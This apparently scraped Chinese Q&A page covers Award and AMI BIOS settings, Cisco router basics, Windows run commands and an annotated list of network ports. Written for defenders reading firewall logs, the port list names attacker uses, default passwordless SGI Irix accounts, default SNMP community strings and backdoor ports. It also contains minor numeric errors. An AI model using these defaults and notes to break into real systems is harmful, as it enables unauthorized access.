Disable關閉節電功能,是預設設置。
User Defined(用戶定義)允許用戶根據自己的需要設定節電的模式。
(2)Video Off Method(視頻關閉)該選項可設為V/H Sync+Blank、Dpms、Blank Screen三種。 V/H Sync+Blank將關閉顯示卡水平與垂直同步信號的輸出埠,向視頻緩沖區寫入空白信號。 DPMS(顯示電源管理系統)設定允許BIOS在顯示卡有節電功能時,對顯示卡進行節能信息的初始化。只有顯示卡支持綠色功能時,用戶才能使用這些設定。如果沒有綠色功能,則應將該行設定為Blank Screen(關掉屏幕)。
Blank Screen(關掉屏幕)當管理關掉顯示器屏幕時,預設設定能通過關閉顯示器的垂直和水平掃描以節約更多的電能。沒有綠色功能的顯示器,預設設定只能關掉屏幕而不能終止CRT的掃描。
(3)PM Timers(電源管理記時器)下面的幾項分別表示對電源管理超時設置的控制。Doze,Stand By和Suspend Mode項設置分別為該種模式激活前的機器閑置時間,在MAX Saving模式,它每次在一分鍾後激活。在MIN Saving模式,它在一小時後激活。
(4)Power Down和Resume Events(進入節電模式和從節電狀態中喚醒的事件)。該項下面所列述的事件可以將硬碟設在最低耗電模式,工作、等待和懸掛系統等非活動模式中若有事件發生,如敲任何鍵或IRQ喚醒、滑鼠動作、MODEM振鈴時,系統自動從電源節電模式下恢復過來。
PNP/PCI Configuration Setup(即插即用與PCI狀態設定)
該菜單項用來設置即插即用設備和PCI設備的有關屬性。
(1)PNP OS Installed:如果軟體系統支持Plug&Play,如Win95,可以設置為YES。
(2)Resources Controlled By:AWARD BIOS支持「即插即用」功能,可以檢測到全部支持「即插即用」的設備,這種功能是為類似Win95操作系統所設計的,可以設置Auto(自動)或Manual(手動)。
(3)Resources Configuration Data:預設值是Disabled,如果選擇Enabled,每次開機時,Extend System Configuration Data(擴展系統設置數據)都會重新設置。
(4)IRQ3/4/5/7/9/10/11/12/14/15:在預設狀態下,除了IRQ3/4,所有的資源,都設計為被PCI設備佔用,如果某些ISA卡要佔用某資源可以手動設置。
Intergrated Peripherals Setup(外部設備設定)
該菜單項用來設置集成主板上的外部設備的屬性。
(1)IDE HDD Block Mode:如果選擇Enable,可以允許硬碟用快速塊模式(Fast Block Mode)來傳輸數據。
(2)IDE PIO Mode:這個設置取決於系統硬碟的速度,共有AUTO,0,1,2,3,4五個選項,Mode4硬碟傳輸速率大於是16.6MB/s,其它模式的小於這個速率。不要選擇超過硬碟速率的模式,這樣會丟失數據。
(3)IDE UMDA(Ultra DMA)Mode:Intel 430TX晶元提供了Ultra DMA Mode,它可以把傳輸速率提高到一個新的水準。
Load BIOS Defaults(裝入BIOS預設值)
主機板的CMOS中有一個出廠時設定的值。若CMOS內容被破壞,則要使用該項進行恢復。由於BIOS預設設定值可能關掉了所有用來提高系統的性能的參數,因此使用它容易找到主機板的安全值和除去主板的錯誤。該項設定隻影響BIOS和Chipset特性的選定項。不會影響標準的CMOS設定。移動游標到屏幕的該項然後按下Y或Enter鍵,屏幕顯示是否要裝入BIOS預設設定值,鍵入Y即裝入,鍵入N即不裝入。選擇完後,返回主菜單。
Supervisor Password And User Password Setup(超級用戶與普通用戶密碼設定)
User Passowrd Setting功能為設定密碼。如果要設定此密碼,首先應輸入當前密碼,確定密碼後按Y,屏幕自動回到主畫面。輸入User Passowrd可以使用系統,但不能修改CMOS的內容。輸入Supervisor Password可以輸入、修改CMOS BIOS的值,Supervisor Password是為了防止
他人擅自修改CMOS的內容而設置的。用戶如果使用IDE硬碟驅動器,該項功能可以自動讀出硬碟參數,並將它們自動記入標准CMOS設定中,它最多可以讀出四個IDE硬碟的參數。
以上介紹了Award BIOS Setup的常用選項的含義及設置辦法。更改設置後,選Save and Exit Setup項或按F10鍵保存,使所修改的內容生效。
AWARD BIOS是一種比較常用的BIOS,各主板製造商都其基礎根據主板特性上進行了調整。因而本文只介紹了AWARD BIOS的一些最普遍的設置,以供參考,讀者還應仔細閱讀隨主板附帶的說明書。
AMI BIOS
BIOS是英文Basic Input/Output System(基本輸入/輸出系統)的縮寫,其程序儲存在主板上的 EPROM或Flash ROM 內,作用是測試裝在主板上的部件能否正常工作,並提供驅動程序介面,設定系統相關配備的組態。當你的系統配件與原CMOS參數不符合時,或CMOS參數遺失時,或系統不穩定時,就需要進入BIOS設定程序,以重新配置正確的系統組態。
進入AMI BIOS設定程序
1. 打開系統電源或重新啟動系統,顯示器屏幕將出現自我測試的信息;
2. 當屏幕中間出現"Press to enter setup"提示時,按下 鍵,就可以進入BIOS設定程序。
3. 以方向鍵移動至你要修改的選項,按下鍵即可進入該選項的子畫面;
4. 使用 方向鍵及〈Enter〉鍵即可修改所選項目的值,也可用滑鼠(包括PS/2滑鼠)選擇BIOS選項並修改。
5. 任何時候按下鍵即可回到上一畫面;
6. 在主畫面下,按下鍵,選擇「Saving Changes And Exit"即可儲存你的新設定並重新啟動系統。選擇「Exit Without Saving",則會忽略你的改變而跳出設定程序。
Standard Setup(標准設定)窗口
Date/Time: 顯示當前的日期/時間,可修改。
Floppy Drive A,B: 設定軟盤驅動器類型為None/720K/1.2M/1.44M/2.88M 。
Pri Master/Slave以及Sec Master/Slave: 此選項可設定:
HDD Type(硬碟類型): Auto(自動檢測)、SCSI(SCSI HDD)、CD-ROM驅動器、Floptical(LS-120大容量軟碟機)或是Type 1~47等IDE設備。
LBA/Large: 硬碟LBA/Large 模式是否打開。目前540M以上的硬碟都要將此選項打開(On),但在Novell Netware 3.xx或4.xx版等網路操作系統下要視情況將它關掉(Off)。
Block Mode: 將此選項設為On,有助於硬碟存取速度加快,但有些舊硬碟不支持此模式,必須將此選項設為Off。32 Bit Mode: 將此選項設為On,有助於在32位的操作系統(如WIN95/NT)下加快硬碟傳輸速度,有些舊硬碟不支持此模式,必須將此選項設為Off。
PIO Mode: 支持PIO Mode0~Mode5(DMA/33)。用BIOS程序自動檢查硬碟時,會自動設置硬碟的PIO Mode。
注意:當你在系統中接上一台IDE設備(如硬碟、光碟機等)時,最好進入BIOS,讓它自動檢測。如果使用的是抽屜式硬碟的話,可將Type設成Auto,或將Primary以及Secondary的Type都改成 Auto 即可。所謂Primary指的是第一IDE介面,對應於主板上的IDE0插口,Secondary指的是第二IDE介面,對應於主板上的IDE1插口。每個IDE介面可接Master/Slave(主/從)兩台IDE設備。
Advanced Setup(高級設定)窗口
1st/2rd/3rd/4th Boot Device: 開機啟動設備的順序,可選擇由IDE0~3、SCSI、光碟機、軟碟機、 Floptical (LS-120大容量軟碟機)或由Network(網路)開機。
S.M.A.R.T For HardDisk: 開啟(Enable)硬碟S.M.A.R.T 功能。如果硬碟支持,此功能可提供硬碟自我監控的功能。
Quick Boot: 開啟此功能後,可使開機速度加快。
Floppy Drive Swap: 若將此功能Enable,可使A驅與B驅互換。
PS/2 Mouse Support : 是否開啟PS/2滑鼠口,若設定為Enable,則開機時,將IRQ12保留給PS/2滑鼠使用,若設定為Disable,則IRQ12留給系統使用。
Password Check: 設定何時檢查Password(口令),若設定成Setup時,每次進入BIOS設定時將會要求輸入口令,若設定成Always時,進入BIOS或系統開機時,都會要求輸入口令,但先決條件是必須先設定口令(Security窗口中的User選項)。
Primary Display: 設定顯示卡的種類。
Internal Cache: 是否開啟CPU內部高速緩存(L1 Cache),應設為Enable。
External Cache: 是否開啟主板上的高速緩存(L2 Cache),應設為Enable。
System BIOS Cacheable: 是否將系統BIOS程序復制到內存中,以加快BIOS 存取速度。
C000-DC00,16K Shadow: 此8項是將主內存的UpperMemory(上位內存區)開啟,將所有插卡上 ROM程序映射到內存中,以加快CPU對BIOS的執行效率。Disable:不開啟本功能;Enable:開啟,且可提供讀寫區段功能;Cached:開啟,但不提供讀寫功能。
Chipset Setup(晶元組設定)窗口
本功能中的選項有助於系統效率的提升,建議使用默認值。若將某些Chipset、DRAM/SDRAM或SRAM 部分的Timing值設得過快,可能會導致系統"死機"或運行不穩定,這時可試著將某些選項的速度值設定慢一點。
USB Function Enabled: 此選項可開啟USB介面的功能,如沒有USB設備,建議將此選項設為Disable, 否則會浪費一個IRQ資源。
DRAM Write Timing: 設定DRAM的寫入時序,建議值如下: 70ns DRAM: X-3-3-3; 60ns DRAM: X-2-2-2。
Page Mode DRAM Read Timing: 設定DRAM讀取時序,建議值如下 : 70ns DRAM: X-4-4-4; 60ns DRAM: X-3-3-3。
RAS Precharge Period: 設定DRAM/EDO RAM的Precharge(預充電)時間,建議設成4T。
RAS to CAS Delay Time: 設定DRAM中RAS到CAS延遲時間,建議設定成3T。
EDO DRAM Read Timing: 設定EDO DRAM讀取時序,建議值如下: 70ns DRAM : X-3-3-3; 60ns DRAM : X-2-2-2。
DRAM Speculative Read: 此選項是設定DRAM推測性的引導讀取時序,建議設定成Disable。
SDRAM CAS Latency: 設定SDRAM的CAS信號延遲時序,建議設定值如下 :
15ns(66MHz)/12ns(75MHz) SDRAM: 3
10ns(100MHz) SDRAM: 2。
SDRAM Timing: 設定SDRAM(同步內存)的時序,建議設定值如下:
15ns(66MHz)/12ns(75MHz) SDRAM: 3-6-9
10ns(100MHz) SDRAM: 3-4-7。
注意:若系統使用SDRAM不穩時,建議將SDRAM速度調慢。
SDRAM Speculative Read : 此選項是設定SDRAM推測性的引導讀取時序,建議設定成Disable。
Pipe Function: 此選項設定是否開啟Pipe Function(管道功能),建議設定成Enable。
Slow Refresh: 設定DRAM的刷新速率,有15/30/60/120us ,建議設在60us。
Primary Frame Buffer: 此選項保留,建議設定成Disable。
VGA Frame Buffer: 設定是否開啟VGA幀緩沖,建議設為Enable。
Passive Release: 設定Passive Release(被動釋放)為Enable時,可確保CPU與PCI匯流排主控晶元(PCI Bus Master)能隨時重獲對匯流排的控制權。
ISA Line Buffer: 是否開啟ISA匯流排的Line Buffer,建議設為Enable。
Delay Transaction: 設定是否開啟晶元組內部的Delay Transaction(延時傳送),建議設成 Disable。
AT Bus Clock: 設定ISA匯流排時鍾,建議設成Auto。
Power Management Setup(能源管理)窗口
能源管理功能可使大部份周邊設備在閑置時進入省電功能模示,減少耗電量,達到節約能源的目的。電腦在平常操作時,是工作在全速模式狀態,而電源管理程序會監視系統的圖形、串並口、硬碟的存取、鍵盤、滑鼠及其他設備的工作狀態,如果上述設備都處於停頓狀態,則系統就
會進入省電模式,當有任何監控事件發生,系統即刻回到全速工作模式的狀態。省電模式又分為「全速模式(Normal)、打盹模式 (Doze)、待命模式(Standby)、沉睡模式(Suspend)",系統耗電量大小順序:Normal>Doze> Standby > Suspend。
Power Management/APM: 是否開啟APM省電功能。若開啟(Enable),則可設定省電功能。
Green PC Monitor Power State/Video Power Down Mode/Hard Disk Power Down Mode :設定顯示器、顯示卡以及硬碟是否開啟省電模式,可設定成Standby、Suspend以及Off(即不進入省電模式)。
Video Power Down Mode: 設定顯示器在省電模式下的狀態 isable: 不設定 ;Stand By: 待命模式;Suspend: 沉睡模式。
Hard Disk Power Down Mode: 設定硬碟在省電模式下的狀態。(同上)
Standby Timeout/Suspend Timeout: 本選項可設定系統在閑置幾分鍾後,依序進入Standby Mode/Suspend Mode等省電模式。
Display Activity: 當系統進入Standby Mode時,顯示器是否進入省電模示,Ingroe:忽略不管;Monitor:開啟。
Monitor Serial Port/Paralell Port/Pri-HDD/Sec- HDD/VGA /Audio/Floppy: 當系統進入省電模式後,是否監視串並行口、主從硬碟、顯示卡、音效卡、軟碟機的動作。Yes:監視,即各設備如有動作,則系統恢復到全速工作模式;N不監視。
Power Button Override: 是否開啟電源開關功能。
Power Button Function: 此選項是設定當使用ATX電源時,電源按扭(SUS-SW) 的作用。
Soft Off: 按一次就進入Suspend Mode,再按一次就恢復運行。Green: 按第一下便是開機,關機時要按住4秒。
Ring resume From Soft Off:是否開啟Modem喚醒功能。
RTC Alarm Resume From Soft Off: 是否設定BIOS 定時開機功能。
PCI/PnP Setup窗口
此選項可設定即插即用(PnP)功能。
OnBoard USB: 是否開啟晶元組中的USB功能。
Plug and Play Aware OS: 如你的操作系統(OS)具有PnP功能(如 Win95),此項應選Yes;若不是,則選No。如某些 PnP卡無法檢測到時,建議設成No。
PCI Latency Timer: 此選項可設定PCI時鍾的延遲時序。
Offboard PCI IDE Card: 如使用了其它的PCI IDE卡,則此項必須設定,這要視你的PCI IDE卡是插在哪個Slot(1-4)上而定,並設定以下各IDE IRQ 值。Slot5、6以及Hardwared為保留選項。
Offboard PCI IDE Primary IRQ: 設定PCI IDE卡上IDE 0所要佔用的INT# ,一般都是設定成INT#A。
Offboard PCI IDE Secondary IRQ: 設定PCI IDE卡上IDE 1所要佔用的INT#,一般都是設定成 INT#B。
Assign IRQ to PCI VGA Card: 指定一個IRQ給VGA卡使用,一般不用指定IRQ給VGA卡。
IRQ 3、4、5、7、9、10、11、12、14、15/DMA Channel 0、1、3、5、6、7:本選項是設定各IRQ/DMA 是否讓PnP卡自動配置,若設定成PCI/PnP,則BIOS檢測到PnP卡時,會挑選你所有設成PCI/PnP狀態的其中一個IRQ/DMA來使用;反之,若設成ISA/EISA,則BIOS 將不會自動配置。一般設為PCI/PnP。
Peripheral Setup(外圍設備設定)窗口

Ⅷ 系統里的那些埠在哪裡

什麼是埠號,一個埠就是一個潛在的通訊通道,也是一個入侵通道,開放一個埠就是一台計算機在網路上打開了一扇窗戶,黑客入侵的方法就是用手工掃描或利用掃描軟體找到伺服器所開放的埠,去根據其相應的漏洞對伺服器進行入侵或攻擊,因此對埠的了解是非常重要的。

埠大概分為三類:

1:公認埠(well known ports):從0-1023,他們是綁定於一些服務。通常這些埠的通信明確表明了某種服務的協議。比如,21埠是FTP服務所開放的。

2:注冊埠(registrerd ports):從1024-49151,他們鬆散的綁定於一些服務也就是說有許多服務綁定於這些埠,這些埠同樣用於許多其他目的。比如,許多系統處理動態埠是從1024開始的。

3:動態或私有埠(dynamic and/or private ports):從49512-65535,理論上不應該為服務分配這些埠。實際上,計算機通常從1024開始分配動態埠。當然也有例外的,SUN的RPC埠從32768開始。

下邊附常用埠列表:

埠大全

不同的埠有不同的作用希望大家能有所收獲。

0 通常用於分析操作系統。這一方法能夠工作是因為在一些系統中「0」是無效埠,當你試圖使用一種通常的閉合埠連接它時將產生不同的結果。一種典型的掃描:使用IP地址為0.0.0.0,設置ACK位並在乙太網層廣播。

1 tcpmux 這顯示有人在尋找SGI Irix機器。Irix是實現tcpmux的主要提供者,預設情況下tcpmux在這種系統中被打開。Iris機器在發布時含有幾個預設的無密碼的帳戶,如lp, guest, uucp, nuucp, demos, tutor, diag, EZsetup, OutOfBox, 和4Dgifts。許多管理員安裝後忘記刪除這些帳戶。因此Hacker們在Internet上搜索tcpmux並利用這些帳戶。

7 Echo 你能看到許多人們搜索Fraggle放大器時,發送到x.x.x.0和x.x.x.255的信息。常見的一種DoS攻擊是echo循環(echo-loop),攻擊者偽造從一個機器發送到另一個機器的UDP數據包,而兩個機器分別以它們最快的方式回應這些數據包。另一種東西是由DoubleClick在詞埠建立的TCP連接。有一種產品叫做「Resonate Global Dispatch」,它與DNS的這一埠連接以確定最近的路由。Harvest/squid cache將從3130埠發送UDP echo:「如果將cache的source_ping on選項打開,它將對原始主機的UDP echo埠回應一個HIT reply。」這將會產生許多這類數據包。

11 sysstat 這是一種UNIX服務,它會列出機器上所有正在運行的進程以及是什麼啟動了這些進程。這為入侵者提供了許多信息而威脅機器的安全,如暴露已知某些弱點或帳戶的程序。這與UNIX系統中「ps」命令的結果相似。再說一遍:ICMP沒有埠,ICMP port 11通常是ICMP type=11。

19 chargen 這是一種僅僅發送字元的服務。UDP版本將會在收到UDP包後回應含有垃圾字元的包。TCP連接時,會發送含有垃圾字元的數據流知道連接關閉。Hacker利用IP欺騙可以發動DoS攻擊。偽造兩個chargen伺服器之間的UDP包。由於伺服器企圖回應兩個伺服器之間的無限的往返數據通訊一個chargen和echo將導致伺服器過載。同樣fraggle DoS攻擊向目標地址的這個埠廣播一個帶有偽造受害者IP的數據包,受害者為了回應這些數據而過載。

21 ftp 最常見的攻擊者用於尋找打開「anonymous」的ftp伺服器的方法。這些伺服器帶有可讀寫的目錄。Hackers或Crackers 利用這些伺服器作為傳送warez (私有程序) 和pron的節點。
22 ssh PcAnywhere 建立TCP和這一埠的連接可能是為了尋找ssh。這一服務有許多弱點。如果配置成特定的模式,許多使用RSAREF庫的版本有不少漏洞。(建議在其它埠運行ssh)。還應該注意的是ssh工具包帶有一個稱為make-ssh-known-hosts的程序。它會掃描整個域的ssh主機。你有時會被使用這一程序的人無意中掃描到。UDP(而不是TCP)與另一端的5632埠相連意味著存在搜索pcAnywhere的掃描。5632(十六進制的0x1600)位交換後是0x0016(使進制的22)。

23 Telnet 入侵者在搜索遠程登陸UNIX的服務。大多數情況下入侵者掃描這一埠是為了找到機器運行的操作系統。此外使用其它技術,入侵者會找到密碼。

25 smtp 攻擊者(spammer)尋找SMTP伺服器是為了傳遞他們的spam。入侵者的帳戶總被關閉,他們需要撥號連接到高帶寬的e-mail伺服器上,將簡單的信息傳遞到不同的地址。SMTP伺服器(尤其是sendmail)是進入系統的最常用方法之一,因為它們必須完整的暴露於Internet且郵件的路由是復雜的(暴露+復雜=弱點)。

53 DNS Hacker或crackers可能是試圖進行區域傳遞(TCP),欺騙DNS(UDP)或隱藏其它通訊。因此防火牆常常過濾或記錄53埠。需要注意的是你常會看到53埠做為UDP源埠。不穩定的防火牆通常允許這種通訊並假設這是對DNS查詢的回復。Hacker常使用這種方法穿透防火牆。

67&68 Bootp和DHCP UDP上的Bootp/DHCP:通過DSL和cable-modem的防火牆常會看見大量發送到廣播地址255.255.255.255的數據。這些機器在向DHCP伺服器請求一個地址分配。Hacker常進入它們分配一個地址把自己作為局部路由器而發起大量的「中間人」(man-in-middle)攻擊。客戶端向68埠(bootps)廣播請求配置,伺服器向67埠(bootpc)廣播回應請求。這種回應使用廣播是因為客戶端還不知道可以發送的IP地址。

69 TFTP(UDP) 許多伺服器與bootp一起提供這項服務,便於從系統下載啟動代碼。但是它們常常錯誤配置而從系統提供任何文件,如密碼文件。它們也可用於向系統寫入文件。

79 finger Hacker用於獲得用戶信息,查詢操作系統,探測已知的緩沖區溢出錯誤,回應從自己機器到其它機器finger掃描。

80 HTTP伺服器所用到的埠。

98 linuxconf 這個程序提供linux boxen的簡單管理。通過整合的HTTP伺服器在98埠提供基於Web界面的服務。它已發現有許多安全問題。一些版本setuid root,信任區域網,在/tmp下建立Internet可訪問的文件,LANG環境變數有緩沖區溢出。此外因為它包含整合的伺服器,許多典型的HTTP漏洞可能存在(緩沖區溢出,歷遍目錄等)

109 POP2 並不象POP3那樣有名,但許多伺服器同時提供兩種服務(向後兼容)。在同一個伺服器上POP3的漏洞在POP2中同樣存在。

110 POP3 用於客戶端訪問伺服器端的郵件服務。POP3服務有許多公認的弱點。關於用戶名和密碼交換緩沖區溢出的弱點至少有20個(這意味著Hacker可以在真正登陸前進入系統)。成功登陸後還有其它緩沖區溢出錯誤。

111 sunrpc portmap rpcbind Sun RPC PortMapper/RPCBIND。訪問portmapper是掃描系統查看允許哪些RPC服務的最早的一步。常見RPC服務有:rpc.mountd, NFS, rpc.statd, rpc.csmd, rpc.ttybd, amd等。入侵者發現了允許的RPC服務將轉向提供服務的特定埠測試漏洞。記住一定要記錄線路中的daemon, IDS, 或sniffer,你可以發現入侵者正使用什麼程序訪問以便發現到底發生了什麼。
113 Ident auth 這是一個許多機器上運行的協議,用於鑒別TCP連接的用戶。使用標準的這種服務可以獲得許多機器的信息(會被Hacker利用)。但是它可作為許多服務的記錄器,尤其是FTP, POP, IMAP, SMTP和IRC等服務。通常如果有許多客戶通過防火牆訪問這些服務,你將會看到許多這個埠的連接請求。記住,如果你阻斷這個埠客戶端會感覺到在防火牆另一邊與e-mail伺服器的緩慢連接。許多防火牆支持在TCP連接的阻斷過程中發回RST,著將回停止這一緩慢的連接。

119 NNTP news 新聞組傳輸協議,承載USENET通訊。當你鏈接到諸如:news://news.hackervip.com/. 的地址時通常使用這個埠。這個埠的連接企圖通常是人們在尋找USENET伺服器。多數ISP限制只有他們的客戶才能訪問他們的新聞組伺服器。打開新聞組伺服器將允許發/讀任何人的帖子,訪問被限制的新聞組伺服器,匿名發帖或發送spam。

135 oc-serv MS RPC end-point mapper Microsoft在這個埠運行DCE RPC end-point mapper為它的DCOM服務。這與UNIX 111埠的功能很相似。使用DCOM和/或RPC的服務利用機器上的end-point mapper注冊它們的位置。遠端客戶連接到機器時,它們查詢end-point mapper找到服務的位置。同樣Hacker掃描機器的這個埠是為了找到諸如:這個機器上運行Exchange Server嗎?是什麼版本?這個埠除了被用來查詢服務(如使用epmp)還可以被用於直接攻擊。有一些DoS攻擊直接針對這個埠。

137 NetBIOS name service nbtstat (UDP) 這是防火牆管理員最常見的信息。

139 NetBIOS File and Print Sharing 通過這個埠進入的連接試圖獲得NetBIOS/SMB服務。這個協議被用於Windows「文件和列印機共享」和SAMBA。在Internet上共享自己的硬碟是可能是最常見的問題。大量針對這一埠始於1999,後來逐漸變少。2000年又有回升。一些VBS(IE5 VisualBasic Scripting)開始將它們自己拷貝到這個埠,試圖在這個埠繁殖。

143 IMAP 和上面POP3的安全問題一樣,許多IMAP伺服器有緩沖區溢出漏洞運行登陸過程中進入。記住:一種Linux蠕蟲(admw0rm)會通過這個埠繁殖,因此許多這個埠的掃描來自不知情的已被感染的用戶。當RadHat在他們的Linux發布版本中默認允許IMAP後,這些漏洞變得流行起來。Morris蠕蟲以後這還是第一次廣泛傳播的蠕蟲。這一埠還被用於IMAP2,但並不流行。已有一些報道發現有些0到143埠的攻擊源於腳本。
161 SNMP(UDP) 入侵者常探測的埠。SNMP允許遠程管理設備。所有配置和運行信息都儲存在資料庫中,通過SNMP客獲得這些信息。許多管理員錯誤配置將它們暴露於Internet。Crackers將試圖使用預設的密碼「public」「private」訪問系統。他們可能會試驗所有可能的組合。SNMP包可能會被錯誤的指向你的網路。Windows機器常會因為錯誤配置將HP JetDirect remote management軟體使用SNMP。HP OBJECT IDENTIFIER將收到SNMP包。新版的Win98使用SNMP解析域名,你會看見這種包在子網內廣播(cable modem, DSL)查詢sysName和其它信息。

162 SNMP trap 可能是由於錯誤配置

177 xdmcp 許多Hacker通過它訪問X-Windows控制台, 它同時需要打開6000埠。

513 rwho 可能是從使用cable modem或DSL登陸到的子網中的UNIX機器發出的廣播。這些人為Hacker進入他們的系統提供了很有趣的信息。

553 CORBA IIOP (UDP) 如果你使用cable modem或DSL VLAN,你將會看到這個埠的廣播。CORBA是一種面向對象的RPC(remote procere call)系統。Hacker會利用這些信息進入系統。

600 Pcserver backdoor 請查看1524埠。

一些玩script的孩子認為他們通過修改ingreslock和pcserver文件已經完全攻破了系統-- Alan J. Rosenthal.

635 mountd Linux的mountd Bug。這是人們掃描的一個流行的Bug。大多數對這個埠的掃描是基於UDP的,但基於TCP的mountd有所增加(mountd同時運行於兩個埠)。記住,mountd可運行於任何埠(到底在哪個埠,需要在埠111做portmap查詢),只是Linux默認為635埠,就象NFS通常運行於2049埠。

1024 許多人問這個埠是干什麼的。它是動態埠的開始。許多程序並不在乎用哪個埠連接網路,它們請求操作系統為它們分配「下一個閑置埠」。基於這一點分配從埠1024開始。這意味著第一個向系統請求分配動態埠的程序將被分配埠1024。為了驗證這一點,你可以重啟機器,打開Telnet,再打開一個窗口運行「natstat -a」,你將會看到Telnet被分配1024埠。請求的程序越多,動態埠也越多。操作系統分配的埠將逐漸變大。再來一遍,當你瀏覽Web頁時用「netstat」查看,每個Web頁需要一個新埠。

1025,1026 參見1024

1080 SOCKS 這一協議以管道方式穿過防火牆,允許防火牆後面的許多人通過一個IP地址訪問Internet。理論上它應該只允許內部的通信向外達到Internet。但是由於錯誤的配置,它會允許Hacker/Cracker的位於防火牆外部的攻擊穿過防火牆。或者簡單地回應位於Internet上的計算機,從而掩飾他們對你的直接攻擊。WinGate是一種常見的Windows個人防火牆,常會發生上述的錯誤配置。在加入IRC聊天室時常會看到這種情況。

1114 SQL 系統本身很少掃描這個埠,但常常是sscan腳本的一部分。

1243 Sub-7木馬(TCP)

1433 MSSQL資料庫服務埠

1524 ingreslock 後門許多攻擊腳本將安裝一個後門Shell於這個埠(尤其是那些針對Sun系統中sendmail和RPC服務漏洞的腳本,如statd, ttdbserver和cmsd)。如果你剛剛安裝了你的防火牆就看到在這個埠上的連接企圖,很可能是上述原因。你可以試試Telnet到你的機器上的這個埠,看看它是否會給你一個Shell。連接到600/pcserver也存在這個問題。
2049 NFS NFS程序常運行於這個埠。通常需要訪問portmapper查詢這個服務運行於哪個埠,但是大部分情況是安裝後NFS運行於這個埠,Hacker/Cracker因而可以閉開portmapper直接測試這個埠。

3128 squid 這是Squid HTTP代理伺服器的默認埠。攻擊者掃描這個埠是為了搜尋一個代理伺服器而匿名訪問Internet。你也會看到搜索其它代理伺服器的埠:8000/8001/8080/8888。掃描這一埠的另一原因是:用戶正在進入聊天室。其它用戶(或伺服器本身)也會檢驗這個埠以確定用戶的機器是否支持代理。

3306 MYsql資料庫服務埠

5632 pcAnywere 你會看到很多這個埠的掃描,這依賴於你所在的位置。當用戶打開pcAnywere時,它會自動掃描區域網C類網以尋找可能得代理(譯者:指agent而不是proxy)。Hacker/cracker也會尋找開放這種服務的機器,所以應該查看這種掃描的源地址。一些搜尋pcAnywere的掃描常包含埠22的UDP數據包。

6776 Sub-7 artifact 這個埠是從Sub-7主埠分離出來的用於傳送數據的埠。例如當控制者通過電話線控制另一台機器,而被控機器掛斷時你將會看到這種情況。因此當另一人以此IP撥入時,他們將會看到持續的,在這個埠的連接企圖。(譯者:即看到防火牆報告這一埠的連接企圖時,並不表示你已被Sub-7控制。)

6970 RealAudio RealAudio客戶將從伺服器的6970-7170的UDP埠接收音頻數據流。這是由TCP7070埠外向控制連接設置的。

13223 PowWow PowWow 是Tribal Voice的聊天程序。它允許用戶在此埠打開私人聊天的連接。這一程序對於建立連接非常具有「進攻性」。它會「駐扎」在這一TCP埠等待回應。這造成類似心跳間隔的連接企圖。如果你是一個撥號用戶,從另一個聊天者手中「繼承」了IP地址這種情況就會發生:好象很多不同的人在測試這一埠。這一協議使用「OPNG」作為其連接企圖的前四個位元組。

17027 Concent 這是一個外向連接。這是由於公司內部有人安裝了帶有Concent "adbot" 的共享軟體。Concent "adbot"是為共享軟體顯示廣告服務的。使用這種服務的一種流行的軟體是Pkware。有人試驗:阻斷這一外向連接不會有任何問題,但是封掉IP地址本身將會導致adbots持續在每秒內試圖連接多次而導致連接過載:

機器會不斷試圖解析DNS名—ads.concent.com,即IP地址216.33.210.40 ;216.33.199.77 ;216.33.199.80 ;216.33.199.81;216.33.210.41。(譯者:不知NetAnts使用的Radiate是否也有這種現象)

27374 Sub-7木馬(TCP)

30100 NetSphere木馬(TCP) 通常這一埠的掃描是為了尋找中了NetSphere木馬。

31337 Back Orifice 「elite」 Hacker中31337讀做「elite」/ei』li:t/(譯者:法語,譯為中堅力量,精華。即3=E, 1=L, 7=T)。因此許多後門程序運行於這一埠。其中最有名的是Back Orifice。曾經一段時間內這是Internet上最常見的掃描。現在它的流行越來越少,其它的木馬程序越來越流行。

31789 Hack-a-tack 這一埠的UDP通訊通常是由於"Hack-a-tack"遠程訪問木馬(RAT, Remote Access Trojan)。這種木馬包含內置的31790埠掃描器,因此任何31789埠到317890埠的連接意味著已經有這種入侵。(31789埠是控制連接,317890埠是文件傳輸連接)

32770~32900 RPC服務 Sun Solaris的RPC服務在這一范圍內。詳細的說:早期版本的Solaris(2.5.1之前)將portmapper置於這一范圍內,即使低埠被防火牆封閉仍然允許Hacker/cracker訪問這一埠。掃描這一范圍內的埠不是為了尋找portmapper,就是為了尋找可被攻擊的已知的RPC服務。

33434~33600 traceroute 如果你看到這一埠范圍內的UDP數據包(且只在此范圍之內)則可能是由於traceroute。

Ⅸ 思科路由器2600配置

老老實實看書吧,可以先看個ccna學習指南。

隨便舉幾個指令例子給你好了:

Route> 你進來是這個樣子
Route>en 打個en回車 進入特權模式
Route# 就是這個樣子
Router#conf t 打完這個
Enter configuration commands, one per line. End with CNTL/Z. 這個是自動顯示出來的,別打
Router(config)# 就進入全局配置模式
Router(config)#hostname R1 打這個就改名
R1(config)# 現在名字叫r1 了
R1(config)#exit 打這個就退出全局配置模式了
%SYS-5-CONFIG_I: Configured from console by console

R1#show run 打這個就看配置了
Building configuration...

Current configuration : 510 bytes
!
version 12.2
no service password-encryption
!
hostname R1
!
!
!
!
!
ip ssh version 1
!
!
interface FastEthernet0/0
no ip address
plex auto
speed auto
shutdown

下面一大堆就不顯示了,先教你進埠配ip

R1#conf t
Enter configuration commands, one per line. End with CNTL/Z.
R1(config)#interface FastEthernet0/0 這樣就是進埠f0/0 你自己對應你的埠
R1(config-if)#ip add 192.168.1.1 255.255.255.0 這個就是配ip了
R1(config-if)#no sh 這個是up埠

%LINK-5-CHANGED: Interface FastEthernet0/0, changed state to up

這個時候你拿台電腦,連上配好的口
電腦的ip 配 192.168.1.2 255.255.255.0

路由器上的燈該閃了,路由器界面上會顯示類似
%LINEPROTO-5-UPDOWN: Line protocol on Interface FastEthernet0/0, changed state to up
的信息。

配到這,你在電腦上ping 192.168.1.1 是通的。

其實找本書翻翻一上午足夠了。有問題留言我。

Ⅹ 系統配置

winver---------檢查Windows版本
wmimgmt.msc----打開windows管理體系結構(WMI)
wupdmgr--------windows更新程序
wscript--------windows腳本宿主設置
write----------寫字板
winmsd---------系統信息
wiaacmgr-------掃描儀和照相機向導
winchat--------XP自帶區域網聊天

mem.exe--------顯示內存使用情況
Msconfig.exe---系統配置實用程序
mplayer2-------簡易widnows media player
mspaint--------畫圖板
mstsc----------遠程桌面連接
mplayer2-------媒體播放機
magnify--------放大鏡實用程序
mmc------------打開控制台
mobsync--------同步命令

dxdiag---------檢查DirectX信息
drwtsn32------ 系統醫生
devmgmt.msc--- 設備管理器
dfrg.msc-------磁碟碎片整理程序
